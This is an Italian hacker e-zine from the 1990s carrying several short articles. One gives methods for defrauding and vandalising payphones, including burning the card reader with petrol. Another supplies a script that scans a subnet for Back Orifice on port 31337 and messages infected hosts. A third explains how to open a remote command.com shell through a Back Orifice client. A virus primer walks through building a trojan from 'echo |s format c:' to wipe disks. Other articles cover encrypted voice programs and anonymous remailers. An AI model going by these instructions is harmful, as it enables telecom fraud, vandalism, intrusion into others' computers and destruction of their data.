non a caso ho usato l'ip 192.168.0.0 - 192.168.255.255
questo range di ip è reso apposta disponibile per questo genere di cose
dall'autorità per l'assegnazione degli indirizzi IP (IANA)

.... e con questo ho concluso... un ringraziamento a BoBo.

..... per qualunque suggerimento emailate pure ... questo è il primo di
una lunga serie di articoli (spero interessanti)...

.... attenti .... la micia mascherata vi osserva ....

Byex LaNdo








+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




_________ .__
/ _____/ ____ _______|__| ____ ____ ____
\_____ \_/ __ \\___ / |/ _ \ / \_/ __ \
/ \ ___/ / /| ( <_> ) | \ ___/
/_______ /\___ >_____ \__|\____/|___| /\___ >
\/ \/ \/ \/ \/ BoBo & LaNdo
__________.__ __ .__
\______ \ |_________ ____ _____ | | _|__| ____ ____
| ___/ | \_ __ \_/ __ \\__ \ | |/ / |/ \ / ___\
| | | Y \ | \/\ ___/ / __ \| <| | | \/ /_/ >
|____| |___| /__| \___ >____ /__|_ \__|___| /\___ /
\/ \/ \/ \/ \//_____/






D'AMORE DI PHREAKING E DI ALTRE SCIOCCHEZZE: by The Pac-man





DISCLAIMER LEGALE:
Questo documento è di solo scopo informativo e il suo autore declina ogni responsabilità
da ogni suo qualunque utilizzo.

Queste cose sono state già dette e stradette, se non vogliamo pagare le telefonate,
mettiamoci il cuore in pace perché i metodi di seguito elencati funzicano una volta su tre.
I metodi :
Usare una scheda con duecento lire e un'altra possibilmente carica.
Usare 3 schede di cui due completamente scariche.
Dare fuoco al lettore (con questo metodo non si ottiene niente).
Stracciare la cornetta (un souvenir della giornata).

1° Metodo
Inseriamo nel lettore la scheda con duecento lire e poi quando sono finite inseriamo
l'altra scheda non lasciandola andare, facendo ciò dovremmo sentire il rumore del lettore
che cerca di prendere la scheda, terminata la conversazione tiriamo fuori la scheda e
riagganciamo.

2° Metodo
(questa non so se funziona)
Inseriamo una scheda carica nel lettore e componiamo il numero, poi quando il lettore
a letto l'importo inseriamo le altre due schede, cercando di non farle accavallare e
sempre cercando di fare uscire la scheda carica, telefonare al nostro amico emigrato a
Haiti e poi riagganciare tanto paga MAMMA TELECOM.

3° Metodo
Inseriamo quanti più fiammiferi anti-vento accesi abbiamo all'interno del lettore oppure
spruzziamo poca (ma poca sul serio se no scoppia) benzina nel lettore e poi appicchiamo
il rogo.

4° Metodo
Prendiamo una tenaglia e tagliamo il filo della cornetta.
Tanto semplice.


Per informazioni mandatemi un e-mail all'indirizzo pac_man@freemail.it se avete sfide
all'incontrario di molti io le accetto girandole ai più potenti della RTI italiana.

Un saluto a Lele, Marco, Tony, i Matrix, il mio ex-sito, Oldiron e tutti gli Attila_Hack.




P.s. = Più che "HACK THE WORLD", è meglio "TROMBATI NA BELLA FIGA".








+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





COME CRITTARE LE TELEFONATE E PAGARE UN'URBANA INVECE CHE UN'INTERURBANA: by BugByte



Ciauz all ;o) !
Come tutti saprete non è affatto sicuro parlare al telefono perchè qualsiasi deficente
puo ascoltare le nostre telefonate... Saprete anche che in italia le interurbane
(e non solo) sono tra le piu costose del mondo (azz!).

Ebbene oggi grazie a internet si possono risolvere questi 2 problemi, cioè parlare
senza permettere a un terzo di ascoltarci e pagare una telefonata urbana invece di
un'interurbana (wow!). Questo è reso possibile da alcuni programmi che crittano le
telefonate (utilizzando anche una crittazione piuttosto robusta) e che permettono di
parlare con una persona dall'altra parte della terra passando per il proprio provider.

Naturalmente anche l'altra persona deve entrare in internet per riuscire a parlare con
voi pagando un'urbana.. Mentre per crittare solamente la telefonata si puo fare una
connessione dial-up tra i due modem (uno chiama e l'altro aspetta la chiamata). Se dovete
fare una connessione urbana i vantaggi della connessione diretta sono: in internet la
velocità di connessione (a meno che non abbiate una connessione ISDN.. =) calerà parecchio
dato il traffico che c'è in rete, con una connessione diretta una sola persona paga mentre
nella connessione che passa per internet entrambe le persone pagano.


Questo tipo di comunicazione pero è piuttosto scomoda anche se offre una quasi totale
sicurezza, sia per il fatto che entrambe le persone devono avere il modem, sia per il
fatto che la connessione molte volte quando si critta il tutto risulta piuttosto lenta e
che in alternativa bisogna parlare in uno alla volta e passare all'altro tutte le volte
che si ha finito. Io a questo punto preferisco far ascoltare le telefonate se non ho nulla
da nascondere e se ho qualcosa da nascondere non dirla via telefono. Certo se avete degli
amici che abitano in inghilterra e volete fare lunghe chiacchierate con loro(come nel mio
caso ;o) - magari senza crittare la telefonata - questi programmi sono l'ideale.


Prima dicevo: quasi totale. Voi allora potreste chiedervi: ma non c'è una totale sicurezza?
Beh in effetti, facendo i pignoli, se qualcuno è DAVVERO interessato alla nostra telefonata
ed è davvero determinato allora potrebbe farcela..
Ad esempio potrebbe riuscire ad avere la chiave della crittazione o potrebbe registrare il
tutto e decrittarlo in seguito . Cmq gente non preoccupativi c'è una possibilita su cento
che ci riesca ;PP. Comunque è giusto che sappiate che un possibilita c'è..


A questo punto credo vogliate provare qualche programma ;oD
Qui sotto ecco due progs tra i piu noti e il rispettivo url (P.S di entrambi sono
disponibili i sorgenti)

Nautilus http://www.lila.com/nautilus
Speak Freely http://www.fourmilab.ch/speakfree/windows


Questi programmi sono considerati dal governo americano come un' ARMA, infatti è vietata
l'esportazione dagli stati uniti ! Se vi trovate davanti a un programma del genere messo a
disposizione da un server statunitense, non si puo scaricare. Cmq non preoccupatevi dai link
che vi ho elencato si possono scaricare tranquillamente ;-D.


Ora vi spieghero brevemente le caratteristiche di questi due progs..

Speak freely è disponibile sia per window (3.1,95,98,NT) sia per sistemi unix. Per fare
girare questo progs è necessario un 486, un modem a 14.400, una scheda audio e un microfono.
Con questo progs è anche possibile parlare con piu persone contemporaneamente (weoowo!)
E' anche facile da usare e quindi lo consiglio ai neofiti (come me!)

Nautilus è il progs che preferisco. Le richieste hardware sono molto meno esose (un 386
con un modem a 7.200 ) - come se Speak freely chiedesse un computer di ultima generazione
ehehhe - e inoltre dispone di un protocollo di compressione piu avanzato rispetto a Speak
freely.. Nautilus gira sia sui personal computer - con linux, msdos o solaris X86 - sia su
una Sun Sparctation (Solaris o SunOS). Sconsiglio di farlo girare su winz... E' un po piu
tosto da utilizzare rispetto a Speak freely perchè non dispone di un'interfaccia grafica..

Ciauz ! Spero che questo piccolo articolo sia servito a qualcosa !





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


_________________________________________________________________________
_/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_
/~~\_______/~~\____________/~~\___/~~\__/~~\__/~~\_/~~~~\/~~\_/~~\_______
_/~~~~~~\__/~~~~~~\______/~~\_____/~~\__/~~\__/~~\_/~~~~~~~~\_/~~~~~~\___
______/~~\_/~~\________/~~\_______/~~\__/~~\__/~~\_/~~\/~~~~\_/~~\_______
_/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_
_________________________________________________________________________
_____________________________________BoBo & LaNdo______
/~~\________/~~~~~~\__/~~\__/~~\__/~~~~~~\__/~~\__/~~\_
/~~\_______/~~\__/~~\_/~~~\/~~~\_/~~\__/~~\_/~~\__/~~\_
/~~\_______/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_
/~~\_______/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_
/~~~~~~~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_
_______________________________________________________





COME VALANGARE DI PING UN IP (SULLA PORTA DI BO) CON LA LEGGE DALLA NOSTRA PARTE: by Mr.Lamah



Ehehehehehe lo sapevate che il ping di BO non è configurato come sabotaggio informatico,
violazione della privacy e roba del genere?
Infatti la legge del 23 dicembre 1993 n. 547 definisce i "reati informatici",
ma il semplice PING del Back Orifice non e', in se', reato (non configura ne'
la fattispecie di "alterazione di funzionamento", ne' quella di "violenza sulle cose"
in senso lato).
L'unica apparenza di punibilita' percio' (nel caso di un PING) deriva da come tale PING
e' stato inviato, i.e. usando un client Back Orifice? Nel caso, il pingatore e' in
possesso di uno strumento "atto a...", e quindi (in teoria!) si configura la
fattispecie di possesso di strumento idoneo a introdursi in un sistema telematico
od informatico (art. 615 quater).

Per esempio il seguente script

...
for i in $ICMP_FOUND_HOSTS; do
if ( bo_ping $i 31337 "" ); then
cat <<-HERE | bo_send $i 31337 "" 9
Non dovrei essere qui. Lei ha
installato BACK ORIFICE sul suo
PC. Per rimuoverlo, consulti
SUBITO http://attilahack.cjb.net
---
Finche' non lo fara', sara' possibile
a me o ad altri ENTRARE NEL SUO PC!
HERE
fi
done
...

questo genera una marea di PING su una sottorete, ma, noi abbiamo solo avvertito al
boservizzato che è possibile entrare nel suo pc quindi vai a dimostrare la mia mala fede.
Completamente diverso e' invece il discorso, per chi si spinge al di la' del
semplice "ping". Ma questa è un'altra storia...

Ciao a tutti e un sentito ringraziamento a tutto il team di Attila_Hack.

HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ)





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





INTERAGIRE CON BO TRAMITE TELNET: by Mr.Lamah


Per quanto riguarda interagire in una sessione telnet con BO, telnet si può aprire
dal client Bo con il comando App Add, si deve scrivere nella finestra exe.location
Command.com e scegliere una porta a piacere come listen port. Poi si fa telnet
all'indirizzo ip target sulla porta appena scelta... E' una vera e propria shell.

Per quanto riguarda invece il comunicare col server del BO tramite
telnet, cioe' collegarsi alla sua 31337 (o qualunque altra porta
abbia configurato) con telnet, non si puo' fare. Il motivo e' che BO
usa UDP, mentre telnet usa TCP.


HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ)







+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-





___ ___ ___ ___ ___ ___ ___
/\ \ /\ \ /\ \ /\ \ /\ \ /\__\ /\ \
/::\ \ /::\ \ _\:\ \ _\:\ \ /::\ \ /:| _|_ /::\ \
/\:\:\__\ /::\:\__\ /::::\__\ /\/::\__\ /:/\:\__\ /::|/\__\ /::\:\__\
\:\:\/__/ \:\:\/ / \::;;/__/ \::/\/__/ \:\/:/ / \/|::/ / \:\:\/ /
\::/ / \:\/ / \:\__\ \:\__\ \::/ / |:/ / \:\/ /
\/__/ \/__/ \/__/ \/__/ \/__/ \/__/ \/__/
___ ___ ___ ___ ___ BoBo & LaNdo ___
/\__\ /\ \ /\ \ /\ \ /\ \ /\__\ /\ \
/:/ _/_ _\:\ \ /::\ \ _\:\ \ _\:\ \ /:| _|_ /::\ \
|::L/\__\ /\/::\__\ /::\:\__\ /\/::\__\ /\/::\__\ /::|/\__\ /:/\:\__\
|::::/ / \::/\/__/ \;:::/ / \::/\/__/ \::/\/__/ \/|::/ / \:\:\/__/
L;;/__/ \:\__\ |:\/__/ \:\__\ \:\__\ |:/ / \::/ /
\/__/ \|__| \/__/ \/__/ \/__/ \/__/








*******************************
* *
* VIRING CHE PASSIONE!! *
* *
* by Ritz *
* *
* Collaboration by Quequero *
* *
*******************************

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

DESCLAIMER (anche se non servirebbe fa sempre comodo...):
Programmare virus per uso DIDATTICO e PERSONALE non Š illegale, ma lo Š
distribuire i propri virus per danneggiare altri sistemi. L'autore, Ritz,
non ha mai nŠ prodotto nŠ distribuito virus, appunto, e non avvalla alcun uso
illegale del presente articolo: esso Š stato scritto a PURO scopo DIDATTICO.
Se il lettore si ritiene offeso dai suoi contenuti Š pregato di interromperne
immediatamente la lettura. Inoltre, lo stesso autore non si ritiene
responsabile se distruggete il computer VOSTRO o di qualcun altro dopo aver
letto questo articolo.

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Ciao a tutti!!
Come avrete gi… letto nell'intestazione e nel DESCLAIMER io mi chiamo
Ritz, e ho deciso di fare questo articolo perchŠ gli altri argomenti
della rivista erano gi… tutti occupati... :-) suvvia, scherzavo, l'ho scritto
semplicemente perchŠ avevo voglia di provare a scrivere per una e-zine
rendendomi (spero) utile. Sappiate che questo Š la mia prima pubblicazione
per una rivista (e probabilmente dopo che BoBo la legger… sar… anche
l'ultima ;-) ), quindi non lapidatemi se secondo voi sono stato troppo poco
chiaro (cmq non penso :)).

Thanks & greets 2:-Tutto lo staff di softpj e BFI, siete mitiiiiiciii!
-Tutto lo staff dei Ringzer0, e in particolare +MaLaTTia,
con me molto gentile in IRC, spero di diventare come voi!!
-Quequero: il suo sito Š stato anche il primo da me
Teleportato! (Chiss… perchŠ! ;-) ).
Egli inoltre mi ha aiutato nella stesura di questo articolo
consigliandomi dei cambiamenti in alcuni punti. Grazie QUE!
SEI MITIIIICOOOO!!
-Due amici di IRC compagni di classe (DFX e il Mora).
-WhiteFly, anche lui molto disponibile su IRC. Ciaoooo!!!
-xOANINO, sicuramente uno dei migliori crackers italiani
dopo i Ritz (che battuta idiota... perdonami xOA non volevo
offenderti :) ) e probabilmente del mondo! SEI UN
GEEENIOOOOOOO!!!
-Altri vari amici di IRC in ordine sparso ([aLT255],
^courier, moonshadow, ecc.].
-Tutti gli Attila_Hack members e in particolare BoBo.
-Tutti quelli che so che dovevo ringaziare fino a 5 minuti
fa ma che ora non mi ricordo pi- chi sono (frase
lineare e coerente!).
Fuck to : -Un' azienda italiana (di cui non faccio il nome, IHIHIHIH)
che si okkupa di telefonia fissa.
-Al pi- ricco Bill del pianeta: per te non posso dire altro
che: VAMMORIAMMAZZATO (Anche se non sono de Roomaaa).


Dopo 20 minuti buoni per arrivare a scrivere fin qui (suvvia, Š il mio 1ø
articolo dopotutto) voi starete già dicendo: CHE PALLE! giusto? Bene, allora
iniziamo!

In queste righe vorrei introdurvi al concetto di virus e spiegare i vari tipi
che esistono [se state leggendo sperando alla fine di poter mandare in casino
un picc, beh avete sbagliato articolo (o quasi?)].

Dunque dunque...
Secondo il va/occabolario, un virus (informatico, si intende) Š un "Programma,
creato a scopi di sabotaggio o vandalismo, che si trasmette tramite floppy
disk o reti telematiche e danneggia o blocca il funzionamento di un computer
o ne distrugge i dati memorizzati", e fin qui spero che sapeste gi• tutto,
altimenti... ora lo sapete :-)
Ma come viene scritto un viruz?
Beh, un viruz si pu• scrivere in vari linguaggi (Pascal, C, Visual Basic
(con quest'ultimo cmq intendo i macro virus) ), ma il modo pi- efficace per
aver tutto il computer sotto il proprio controllo Š sicuramente l'Assembly: la
stragrande maggioranza di viruz (se si escludono i macro virus) sono scritti
proprio a basso livello.
Naturalmente, essi possono essere scritti anche con linguaggi al alto livello
(basti pensare che per formattare un disco basta un file BAT creato con l'EDIT
del DOS: "echo |s format c:"), ma questi sono meno "liberi", in quanto non
hanno il pieno potere su ogni singolo bit della macchina.
Ma vediamo ora le categorie in cui essi si suddividono:

WORMS
TROJANS
VIRUZ

WORMS
Ossia vermi, in pratica sono dei virus che si riproducono da PC a PC
attraverso la rete. Il pi- celebre esempio Š quello di Robert Morris, che ne
cre• uno (anni '80) il quale infetto moltissimi computer molto rapidamente
grazie un bug indovinate un po' di che: SENDMAIL... strano eh?

TROJANS
E qui arriva il bello: i "Cavalli di Troia"! Non sto a spiegarvi la leggenda
dei greci, l'avrete sentita 6372 volte e ne avrete due ***** cos, quindi
niente epica per oggi.
I trojan sfruttano proprio lo stesso processo: essi sono proggies tipo BO o
NETBUS (W il laming!) che possono darti il controllo completo di un PC, ma
sono anche viruz pi- semplici: ad esempio, create con il Blokko Note un file
avente come unica riga di testo "echo |s format c:" (SENZA VIRGOLETTE),
chiamatelo xyz.bat, procuratevi l'utility BAT2COM (la trovate sul sito di
Quequero, OBBLIGATORIO VISITARLO), usatela per convertire xyz.bat in xyz.com,
NON eseguitelo e... provatelo se dovete reinstallare Winkaz perchŠ si Š
inkiodato perennemente (W Bill): immaginate un po' cosa si pu• fare solo con
Blokko Note. Il motto quindi Š: SPAZIO ALLA FANTASIA.

VIRUZ
Ahia, qui si va sul complicato: essi sono i veri e propri viruz scritti
specialmente in Assembly, e il loro scopo Š quello di riprodursi il pi-
possibile. Ah ecco, a proposito riporto qui di seguito una storiella trovata
su Internet (c'Š anche sul sito di Quequero, giuro non l'ho copiata).

MA WINDOUZ E' UN VIRUZ?
Dunque, la questione Š molto aperta, analizziamola in dettaglio:
1- I virus possono distruggere un computer e cancellare accidentalmente dati.
WINDOUZ E' UN VIRUS.
2- I virus ri replicano velocemente. WINDOUZ E' UN VIRUS.
3- I virus rallenatano i sistema al punto che ti vien voglia di spaccare il
monitor a calci. WINDOUZ E' UN VIRUS.
4- I virus infettano i programmi principali. WINDOUZ E' UN VIRUS.
Per• c'Š da dire altro: i virus sono compatti, veloci, efficienti, funzionano
in qualunque PC, sono GIOIELLINI dell'Assembly, si migliorano col passare del
tempo: allora ecco scpiegato perchŠ WINDOUZ non Š un virus (convinti?).

COME VOLEVASI DIMOSTRARE

Tornando a noi, ecco i principali tipi di viruz:

MACRO VIRUS
Sono dei virus scritti in Visual Basic, rappresentano circa l'80% della
categoria, possono infettare il PC se il file Word, Excel, ecc. viene aperto
attivando la macro, altrimenti non vengono attivati, appunto.
Gli effetti possono essere i pi- svariati, e non riguardano solo
l'applicazione o il file che supportano la macro, ma anche tutto il sistema.

FILE VIRUS
Infettano i file EXE, COM, DLL, DRV, VXD copiandoci il proprio codice di
infezione quando un altro programma infettato viene aperto. Possono essere
residendi (se rimangono nel codice del programma vittima dopo la sua chiusura)
o non residenti (se non ci rimangono).

VIRUS POLIMORFICI
Sono virus molto difficili da individuare in quanto cambiano il loro codice
virale ogni volta che infettano un file. Una volta mi ricordo mi Š capitato
uno di questi virus: ci ho messo 2 giorni per pulire tutto e dopo una
settimana mi Š ricomparso!

BOOT VIRUS
Ops li stavo dimenticando: semplice, sono virus che infettano i settori di
boot di un disco fisso o floppy impedendo, appunto, il boot da essi. Sono
comunque facilmente eliminabili, ad esempio spesso se Winkaz è infettato
basta farlo ripartire da un floppy sano e ripristinare tutto con un
antivirus... per il resto non fanno null'altro. A volte (ma non sempre) pu•
persino bastare fare il boot da floppy e con il comando "sys a: c:" oppure
"fdisk /mbr" (il comando ripulisce il Master Boot Record: NON utilizzatelo se
avete un Boot Loader installato, ad esempio LILO) per mettere tutto a posto.

VIRUS MULTIPARTITI
Questi sono simili ai BOOT VIRUS, per• una volta che c'Š il boot vengono
eseguiti; infettano anche altri file di sistema. Non male.

STEALTH
Vengono chiamati cos perchŠ sono nascosti e possono interagire con
moltissime funzioni del S.O. prendendone il controllo e cambiando un po' di
robette, precisamente hookando varie funzioni e manipolandole.

COMPANION
Molto carini, in pratica si insediano in una o pi- cartelle, creando file
COM con lo stesso nome dei file EXE nascondendo questi ultimi. Naturalmente,
Windouz eseguir… i COM dando loro la precedenza sugli EXE. Immaginate un po'
le conseguenze possibili...

VIRUS IN THE WILD
ne ho sentito parlare molto poco, sono virus scappati dai laboratori di
ricerca (?!#@&%œ$) e potenzialmente molto distruttivi. Non so altro su di
essi a parte che in libera circolazione ce ne sono circa 300.

Oltre a tutti questi ce ne sarebbero altri, es. gli Armored, i Clean On The
Fly (si cancellano dal file vittima quando questo viene letto), gli MBR
stealth, ecc..., ma questi sono meno diffusi e poi per oggi penso che basti
cos. Se volete saperne di pi- cercate su Altavista o...
chiedetemeli... :))) (scherzo eh?)

Bene, penso di aver finito... ho cercato di essere abbastanda rapido ma
chiaro (spesso questi articoli skazzano il lettore :-( ). Per qualunque
domanda, insulto, ringraziamento, ecc.... scrivetemi pure all'indirizzo
sotto.
Ringrazio tutti coloro che sono arrivati fin qui nella lettura e colgo
nuovamente l'occasione per ringraziare Quequero per i suoi suggerimenti.
CIAO A TUTTI!


****************************************************
* *
* Ritz *
* Eclyps3@excite.com *
* - The way is made clear when viewed from above - *
* On ICQ: 41793377 *
* On IRC: Ritz *
* *
****************************************************





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-








________ ________ BoBo & LaNdo _____
____ _/_________ __/_____ ___ _______ __________(_)____
__ / __ __ \_ /_ _ __ \ __ | / / __ `/_ ___/_ /_ _ \
__/ / _ / / / __/ / /_/ / __ |/ // /_/ /_ / _ / / __/
/___/ /_/ /_//_/ \____/ _____/ \__,_/ /_/ /_/ \___/





COSA SONO E COME SI USANO GLI ANONYMOUS REMAILER: by Quequero

La vera ricchezza non si misura con i soldi che possediamo, ma con la cultura che ci
portiamo dietro.
Quequero

Stavolta non crackerò ne reverserò un bel niente ma tratteremo un argomento lo stesso
interessante cioè l'utilizzo degli Anonymous Remailer....Perchè la UIC non è solo
Reversing :)
Home page: http://quequero.cjb.net
E-mail: UIC@mail.usa.com
chan: #crack-it, UIN: 41703512

Difficoltà: Newbies-Intermedio


Introduzione:


Più passa il tempo e più l'anonimità diventa una cosa di fatto, sempre più spesso abbiamo
bisogno di restare anonimi e cercare di far sapere a meno gente possibile informazioni su
di noi, bhè dal momento che uno dei modi più semplici per essere beccati è l'e-mail allora
iniziamo ad anonimizzarla.
Tools usati:
Il pgp anche se opzionale (www.pgpi.com) un cervello, una mano ed un occh
Essay
Come vi accennavo stavolta parleremo degli anonymous remailer, ma prima diamo uno sguardo
alle lettere che ci arrivano e cerchiamo di capire perchè è poco sicuro spedire lettere a
destra e a manca senza opportune precauzioni.
Supponiamo di mandare una mail anonima ma come tutti dovreste sapere le mail mantengono un
header nel quale c'è scritto praticamente tutto, ecco un esempio reale di header:
Mittente: mittente@tin.it
Ricevente: ricevente@tin.it
Return-Path: <mittente@tin.it> ;Path di ritorno della mail
Received: from utente ;Ricevuto da utente (utente è l'id usato per la connessione alla)
([212.216.180.212]) ;IP del mandante (questo è importante)
by fep12-svc.tin.it ;Host del mittente
(InterMail v4.0 201-221-105) with ESMTP ;Versione del programma usato dal server per mandare
la posta
id <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi.alcunidati.
ID_host@UserID
for <ricevente@tin.it>; ;Indirizzo del destinatario
Fri, 4 Jun 1999 17:31:32 +0200 ;Ora e data all'atto della ricezione della mail
e il codice fiscale? :)
From: "Mittente della Lettera" <Mittente@tin.it> ;Nome e indirizzo del mittente
To: "Ricevente della lettera" <Ricevente@tin.it> ;Nome e indirizzo del ricevente
Subject: Soggetto del messaggio ;Soggetto del messaggio
Date: Fri, 4 Jun 1999 17:28:01 +0200;Ora e data all'atto della trasmissione
X-MSMail-Priority: Normal ;Priorità della mail
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Message-Id: <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi.
alcunidati.
ID_host@UserID
Ci manca qualcosa? Credo niente, giusto giusto ci potevano mettere il numero di carta di
credito heheheh :) come vedete una normale mail è......Come dire......Poco anonima, abbiamo
davvero tutti i dati che ci servono per rintracciare il mittente, eccovi adesso un header di
una mail speditami al mio mail-forward cioè UIC@mail.usa.com <mailto:UIC@mail.usa.com>, il
viaggio in pratica è stato: client del mittente-server del mail_forward-mio server:
Return-Path: <Mittente@tin.it>
Received: from smv03.iname.net ;Mail proveniente dal server smv03.iname.net
([165.251.8.81]) by fep02-svc.tin.it ;IP del server iname e host del server che ha ricevuto
la lettera
(InterMail v4.0 201-221-105) with SMTP ;Versione del programm usato dal server e specifica
che è stato usato un serve di posta in uscita SMTP
id <19990707222017.BWVK28793.fep02-svc@smv03.iname.net>;Anno, mese..... insomma l'avete
capito e host del server iname che ha ricevuto la mail
for <Me@tin.it>; Thu, 8 Jul 1999 00:20:17 +0200;Indirizzo del destinatario + giorno anno
ecc.....
Return-Path: <Mittente@tin.it>;Specifica il path di ritorno
Received: from fep03-svc.tin.it (mta03-acc.tin.it [212.216.143.14]);Host e IP del server TIN
che ha ricevuto la lettera
by smv03.iname.net (8.9.3/8.9.1SMV2) with ESMTP id SAA12765;Lettera ricevuta dal server
smv.iname.net e l'ID
for <uic@mail.usa.com> sent by <Mittente@tin.it>; Wed, 7 Jul 1999 18:20:14 -0400 (EDT);
Mail per UIC@mail.usa.com <mailto:UIC@mail.usa.com> spedita da Mittente@in.it nella tal data
ora anno e minuto....
Received: from oemcomputer ([212.216.140.150]) by fep03-svc.tin.it
(InterMail v4.0 201-221-105) with SMTP;Ricevuta da un oemcomputer+IP dal server fep03-svc...
Che ha usato tale programma e un server SMTP
id <19990707221943.NUHX20919.fep03-svc@oemcomputer>;Qui la mail viene rispedita verso di me
for <uic@mail.usa.com>; Thu, 8 Jul 1999 00:19:43 +0200
Message-ID: <000801bec8c6$b1e669e0$fabed8d4@oemcomputer>
From: "Mittente" <Mittente@tin.it>
To: "Quequero" <uic@mail.usa.com>
Subject: Mi serve una mano!!!
Date: Thu, 8 Jul 1999 00:18:45 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0005_01BEC8D7.71788440"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2014.211 ;Programma usato dal mittente per mandare
la lettera
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01BEC8D7.71788440
Content-Type: text/plain;
charset="iso-8859-1"
Non preoccupatevi se siete confusi perchè vi rispiego un po' meglio com'è andata la storia:
Mittente ha scritto una mail con Microsoft Outlook Express 5.00.2014.211 e l'ha inviata
a UIC@mail.usa.com <mailto:UIC@mail.usa.com>, la lettera è inizialmente entrata nel server
fep02-svc.tin.it che a sua volta l'ha rinviata a smv03.iname.net che l'ha poi rispedita
secondo un ID che aveva in memoria a fep03-svc.tin.it dal quale l'ho poi ricevuta io,
semplice no? ;)
Ok nonostante il mail-forward se qualcuno mi tenesse sott'occhio portebbe innanzitutto
leggere la mia posta in uscita, oppure potrebbe con un po di lavoro risalire dall'id che
ho suul server smv03.iname.net al mio vero indirizzo, il problema è che comunque non posso
rispedire la mia mail da casa (altrimenti il ricevente vedrebbe il mio indirizzo) e mi
dovrei avvalere di un servizio di posta anonima come freemail, yahoo ecc.....
Ok l'altra soluzione sarebbe quella di usare un servizio di posta anonima sia per la posta
in entrata che in uscita ma come tutti sapete non è granchè comodo (e poi questi servizi
sono come ICQ, conoscono sempre il vostro IP e potete per questo essere facilmente tracciati),
ci possiamo quindi avvalere ad un comodissimo mail-forward per la posta in entrata e ad un
remailer per quella in uscita giusto? Credo sia la combinazione migliore. Andiamo quindi a
vedere dopo questo lungo preambolo cosa sono questi i famigerati remailer. Un remailer non
è altro che un server che serve a ricevere una mail ed a rimandarla all'apposito destinatario,
l'ulteriore vantaggio è che i remailer oltre che offrire anonimato ci regalano anche sicurezza
dal momento che usandoli in un certo modo possiamo mantenere un anonimato totale, i remailer
si dividono in 3 tipi, Pseudo-Anonymous, CypherPunk e MixMaster, iniziamo a descriverne i vari
tipi.
Pseudo-Anonymous
Questi remailer (detti anche di tipo 0) sono ormai antiquati e non danno un grande anonimato,
il loro modo di agire è questo: in pratica ogni volta che mandate ad uno di questi remailer
(per esempio: anon@anon.penet.fi) loro vi forniscono un ID casuale e strippano le informazioni
nell'header sostituendole con questo ID, il destinatario per rispondervi non dovrà fare altro
che usare il famoso reply-to per rispondervi, il server allora riconoscerà quell'ID e vi
rimanderà la mail, il problema è che gli operatori ed il server stesso conoscono il vostro
vero indirizzo e quindi potrebbero essere corrotti a diffondere degli indirizzi, o peggio
